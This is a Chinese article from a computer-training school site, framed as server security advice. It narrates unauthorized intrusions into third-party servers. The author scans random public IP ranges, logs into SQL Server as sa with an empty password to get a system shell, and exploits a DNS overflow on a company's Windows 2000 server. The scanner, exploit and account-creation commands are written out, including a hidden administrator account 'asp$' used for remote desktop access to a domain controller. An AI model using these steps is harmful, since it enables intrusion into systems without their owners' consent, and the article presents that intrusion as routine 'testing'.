自己動(dòng)手解決服務(wù)器上的安全問(wèn)題
相信現(xiàn)在每個(gè)企業(yè)都有自己的服務(wù)器,但是有服務(wù)器但是安全問(wèn)題一直是個(gè)很頭疼的問(wèn)題對(duì)吧,那么今天咱們就一起看下怎么自己動(dòng)手為服務(wù)器進(jìn)行安全維護(hù)
測(cè)試工具:
1.S掃描器(一種速度極快的多線(xiàn)程命令行下的掃描工具)
2.SQL登陸器
3.DNS溢出工具
4.cmd(微軟命令行工具)
5.scansql.exe(SQL弱口令掃描工具)
一、SQL Server弱口令測(cè)試
1.緣由:
SQL Server是很多中小型企業(yè)、事業(yè)單位的首選數(shù)據(jù)庫(kù)系統(tǒng),由于一些管理員的疏忽或者安全意識(shí)淡薄,總是以數(shù)據(jù)庫(kù)默認(rèn)的用戶(hù)SA登錄數(shù)據(jù)庫(kù),并且采用了默認(rèn)的空密碼或者設(shè)置了若口令。
2.測(cè)試:
以筆者本機(jī)IP為中心,隨機(jī)選取了一個(gè)IP段進(jìn)行測(cè)試。
第一步:在命令提示符下運(yùn)行s掃描器,輸入一個(gè)IP段:
s syn 61.178.*.1 61.178.*.254 1433 掃描到13個(gè)開(kāi)了1433端口的服務(wù)器。
第二步:把掃描結(jié)果保存為一個(gè)文本文件,然后用scansql.exe工具對(duì)這些IP進(jìn)行若口令檢測(cè),檢測(cè)到2個(gè)弱口令的IP。然后打開(kāi)SQL連接器,輸入其中一個(gè)若口令I(lǐng),賬戶(hù)"sa“空密碼連接成功如圖2。然后敲命令”dir c:“,可以執(zhí)行,如圖3。這樣就等于獲得了一個(gè)具有system權(quán)限的shell(比管理員權(quán)限還高!),至此這臺(tái)數(shù)據(jù)庫(kù)服務(wù)器淪陷。(圖2)(圖3)
總結(jié):雖然從上面這個(gè)IP段得到的存在SQL弱口令的服務(wù)器并不多,但如果存在弱口令并且被攻擊者者利用,那對(duì)數(shù)據(jù)庫(kù)服務(wù)器的打擊將是毀滅性的,管理員們一定要加固數(shù)據(jù)庫(kù)的口令。
二、DNS溢出測(cè)試
1.緣由:
DNS溢出漏洞是去年微軟的一個(gè)高危漏洞,攻擊者通過(guò)該漏洞可以溢出
獲得一個(gè)shell,進(jìn)而控制這臺(tái)服務(wù)器。一年過(guò)去了,還有存在該漏洞的服務(wù)器嗎?
2.測(cè)試:
筆者以某企業(yè)網(wǎng)站的IP為中心進(jìn)行測(cè)試。
第一步:先看看該網(wǎng)站W(wǎng)eb服務(wù)器的IP地址,打開(kāi)命令提示符,敲入如下命令:ping www.*.com,得知ip地址為:202.2##.*.196。
第二步:以202.2##.*.196為中心確定一個(gè)IP段,在命令行下用S掃描器掃描開(kāi)放了53端口(DNS端口)的服務(wù)器。對(duì)掃描結(jié)果中的IP逐個(gè)進(jìn)行溢出測(cè)試,經(jīng)過(guò)一次次的測(cè)試找到了一個(gè)存在DNS溢出的IP。在命令行下敲入如下命令:dns -s 202.2##.*.196。
說(shuō)明:服務(wù)器采用的是windows 2000,在1052端口存在DNS溢出漏洞。
第三步:繼續(xù)在命令行下,敲入如下命令:dns -t2000all 202.2##.*.196 1052
第四步:重新打開(kāi)另外一個(gè)命令提示符,敲入命令:telnet 202.2##.*.196 1100,速度很快,返回一個(gè)shell,溢出成功。在telnet界面中敲入如下命令:net query,顯示如圖6,看來(lái)管理員不在線(xiàn)。
第五步:在Telnet命令提示符下敲入命令:net user asp$ "test" /add
net localgroup administrators asp$ /add,建立一個(gè)具有管理員權(quán)限的asp$賬戶(hù),密碼為“test”。在本機(jī)運(yùn)行“mstsc”,打開(kāi)“遠(yuǎn)程桌面連接工具”,輸入IP地址:202.2##.*.196,用戶(hù)名:asp$
密碼:test,連接成功。
第六步:打開(kāi)“管理工具”,發(fā)現(xiàn)這臺(tái)主機(jī)還是一個(gè)域控制器,打開(kāi)“域用戶(hù)和計(jì)算機(jī)”,域成員竟然有43511個(gè)如圖8,看來(lái)這個(gè)企業(yè)的局域網(wǎng)的規(guī)模不小。(圖8)
總結(jié):一年前的漏洞到現(xiàn)在還沒(méi)有打,管理員太失職了。
上面有關(guān)服務(wù)器的兩例安全測(cè)試,雖是個(gè)案不具有普遍性,但其中反應(yīng)出的管理員的疏忽大意及其安全意識(shí)淡薄是不容忽視的。
管理員們往往以維持服務(wù)器的穩(wěn)定、高效地運(yùn)行作為自己的工作目標(biāo),但是對(duì)于服務(wù)器的安全性往往考慮得較少,至少對(duì)于某些管理員是這樣的。
本文由站河南北大青鳥(niǎo)校區(qū)整編而成,如需了解更多IT資訊類(lèi)的文章、新聞、課程和學(xué)習(xí)技巧、就業(yè)案例、招生詳情等問(wèn)題,可以對(duì)在線(xiàn)咨詢(xún)老師進(jìn)行一對(duì)一問(wèn)答!
推薦資訊
- 鄭州那家培訓(xùn)計(jì)算機(jī)好... 2019-02-27
- Linux系統(tǒng)下如何檢測(cè)CC攻擊呢?... 2013-05-15
- 河南電腦學(xué)校T37班學(xué)員張浩就業(yè)感... 2012-10-13
- 青鳥(niǎo)分享:讓Linux開(kāi)機(jī)自動(dòng)激活網(wǎng)... 2012-10-13
- 北大青鳥(niǎo)翔天信鴿2012元旦晚會(huì)圓... 2012-10-13
熱點(diǎn)資訊
- Windows Server 2008 R2如何修改... 2018-09-07
- 常見(jiàn)的五個(gè)Web應(yīng)用漏洞介紹與其解... 2018-09-07
- 刪除遠(yuǎn)程桌面連接IP記錄... 2018-09-07
- 自己動(dòng)手解決服務(wù)器上的安全問(wèn)題... 2018-09-07
- 鄭州北大青鳥(niǎo)學(xué)術(shù)交流:服務(wù)器數(shù)... 2018-09-07